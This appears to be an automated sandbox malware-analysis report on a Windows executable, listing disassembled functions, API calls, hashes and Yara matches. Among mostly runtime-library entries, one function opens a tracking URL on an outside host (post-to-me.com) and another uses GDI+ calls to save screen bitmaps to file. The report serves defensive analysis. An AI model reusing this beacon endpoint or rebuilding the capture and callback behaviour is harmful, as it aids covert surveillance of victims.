                                                                                                                                                                                                                                                                          • List.LIBCMT ref: 024AB22A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
• String ID:
• API String ID: 3281396844-0
• Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
• Instruction ID: acd93df21eb4b15ecb4f6cc5994a6528f2fc969a13f16d71c1480c1e42205113
• Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
• Instruction Fuzzy Hash: BB315232904616DBCB11EFA4C9A06EEBBB2FF34348F04416FC8556B641CB716918CF90
APIs
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
• GdipAlloc.GDIPLUS(00000010), ref: 00402072
• GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
• GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
• GdiplusShutdown.GDIPLUS(?), ref: 004020E3
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
• String ID:
• API String ID: 2357751836-0
• Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
• Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
• Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
• Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
APIs
• std::_Locinfo::_Locinfo.LIBCPMT ref: 024950A3
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 024950B7
• std::_Locinfo::_Locinfo.LIBCPMT ref: 0249511C
• __Getcoll.LIBCPMT ref: 0249512B
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 0249513B
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
• String ID:
• API String ID: 2395760641-0
• Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
• Instruction ID: c7e20b2a9d5f9da7fbf1080f6692a72461b94b7456312bff1bfa397b01fbbd0d
• Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
• Instruction Fuzzy Hash: 072187B2818204AFDF02EFA5C485BDDBBB1BF54715F60800FE085AB280DBB49648CF95
APIs
• GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
• _free.LIBCMT ref: 00431F98
• _free.LIBCMT ref: 00431FBF
• SetLastError.KERNEL32(00000000), ref: 00431FCC
• SetLastError.KERNEL32(00000000), ref: 00431FD5
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
• Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
• Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
• Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
APIs
• GetLastError.KERNEL32(0249DAD7,0249DAD7,00000002,024BED35,024C3951,00000000,?,024B6A05,00000002,00000000,00000000,00000000,?,0249CF88,0249DAD7,00000004), ref: 024C21CA
• _free.LIBCMT ref: 024C21FF
• _free.LIBCMT ref: 024C2226
• SetLastError.KERNEL32(00000000,?,0249DAD7), ref: 024C2233
• SetLastError.KERNEL32(00000000,?,0249DAD7), ref: 024C223C
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
• Instruction ID: af4d423b540286f04ae6747c2631b2d365bb7bfb51b5fef4bc4894398fa3b5d6
• Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
• Instruction Fuzzy Hash: A701D63E2456003BD392AB2D5C44E1B262EABD2B72730012FFC15A6395EFF088028569
APIs
• GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
• _free.LIBCMT ref: 00431F11
• _free.LIBCMT ref: 00431F39
• SetLastError.KERNEL32(00000000), ref: 00431F46
• SetLastError.KERNEL32(00000000), ref: 00431F52
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
• Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
• Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
• Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
APIs
• GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
• _free.LIBCMT ref: 024C2178
• _free.LIBCMT ref: 024C21A0
• SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
• SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                          • Instruction ID: dfcc6cf2fba9aaa4ec78208e4bd32c16c8d0a72247315e59701b53b6ac32b0ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDF0863D2446003BD297772DAC04B5F262A9BC2F62B35022FFD19A23A0EFE185028569
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                                                                                                                                                                                            • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                                                                                                                                                                                            • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                                                                                                                                                                                            • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                                                                                                                                                                                            • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                          • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                          • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024A29A4: TlsGetValue.KERNEL32(?,?,024A0DC2,024A2ECF,00000000,?,024A0DA0,?,?,?,00000000,?,00000000), ref: 024A29AA
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024A7BB1
                                                                                                                                                                                                                                                                            • Part of subcall function 024B121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024B1241
                                                                                                                                                                                                                                                                            • Part of subcall function 024B121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024B125A
                                                                                                                                                                                                                                                                            • Part of subcall function 024B121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024B12D0
                                                                                                                                                                                                                                                                            • Part of subcall function 024B121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024B12D8
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024A7BBF
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024A7BC9
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024A7BD3
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A7BF1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                          • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                          • Instruction ID: 63a6168efa59bc22ac29f1bd201fa3cb77218330133dfbef81b4fe908216b4b4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F0C275A0021867CB25F676983096EF62BDFF0B18B00416FD80057350DF649A158E91
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                          • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA0C4
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA0D6
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA0E8
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA0FA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA10C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
• Instruction ID: 382cd38c2e09aeaaaa1a273c4c19b31b4e060b8ddf77ccfe49a8ec4bbb6470bf
• Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
• Instruction Fuzzy Hash: 5AF044366052186B87F0EF5DE8C6C0777EAAA04754774495FF044D7B11CB71F8908E59

APIs
• _free.LIBCMT ref: 00431748
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 0043175A
• _free.LIBCMT ref: 0043176D
• _free.LIBCMT ref: 0043177E
• _free.LIBCMT ref: 0043178F
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
• Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

APIs
• Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
• Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
• GetCurrentThread.KERNEL32 ref: 0041CD09
• Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
• Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
• String ID:
• API String ID: 2583373041-0
• Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
• Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

APIs
• _free.LIBCMT ref: 024C19AF
  • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
  • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
• _free.LIBCMT ref: 024C19C1
• _free.LIBCMT ref: 024C19D4
• _free.LIBCMT ref: 024C19E5
• _free.LIBCMT ref: 024C19F6
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction ID: 4417496dd0717ad0ad03f2fb9fd64814597d5885c6c8796930f198c9e8e9ef97
• Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction Fuzzy Hash: 93F0F974A003109B9BB17F19AC808053F61AF09B2272042AFF406967B2C774A862DFCE

APIs
• Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024ACF36
• Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024ACF67
• GetCurrentThread.KERNEL32 ref: 024ACF70
• Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024ACF83
• Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024ACF8C
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
• String ID:
• API String ID: 2583373041-0
• Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction ID: 3992490ed3ab8e19f410018ee051475ae6215b4c94b92ceb980878a141b5f018
• Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction Fuzzy Hash: 0FF0A732200500DBCB25EF22E6B08BBB7B6AFE4610340454FF58707590DF21A847DB61

APIs
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492E8E
  • Part of subcall function 02491321: _wcslen.LIBCMT ref: 02491328
  • Part of subcall function 02491321: _wcslen.LIBCMT ref: 02491344
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024930A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: InternetOpen_wcslen
• String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3381584094-4083784958
• Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
• Instruction ID: 1c2729e07f766e1da61ef0d648baf20ecbcd28dc1c6b3c1c4e3a577b2e3f688c
• Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
• Instruction Fuzzy Hash: 315151A5E55344A8E720EFB0BC45B723378FF58712F10643BD518CB2B2E7A19984871E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 024B896A
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 024B8A23
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: fB$csm
                                                                                                                                                                                                                                                                          • API String ID: 3480331319-1586063737
                                                                                                                                                                                                                                                                          • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                          • Instruction ID: 5a47428dcb69194b8a023fc929edc2f1d6e0dc7c2ffe823d3c0f5e2f806064d1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C410A34A00248DBCF11DF29C884ADE7BB9AF49328F14815BE9156B391D732D915CFA1
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\XIaCqh1vRm.exe,00000104), ref: 0042F753
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0042F81E
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0042F828
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                          • API String ID: 2506810119-1944259121
                                                                                                                                                                                                                                                                          • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                          • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\XIaCqh1vRm.exe,00000104), ref: 024BF9BA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024BFA85
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024BFA8F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                          • API String ID: 2506810119-1944259121
                                                                                                                                                                                                                                                                          • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                          • Instruction ID: b85dcb5899922c8ae1927a32365a157012489019140e0e7e76a0796156e4ca4c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04318171A00258EBDB26DF99DC809DEBBFCEF8A710B11406BF80997611D7709A45CBA0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0249C8DE
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                          • API String ID: 2005118841-1866435925
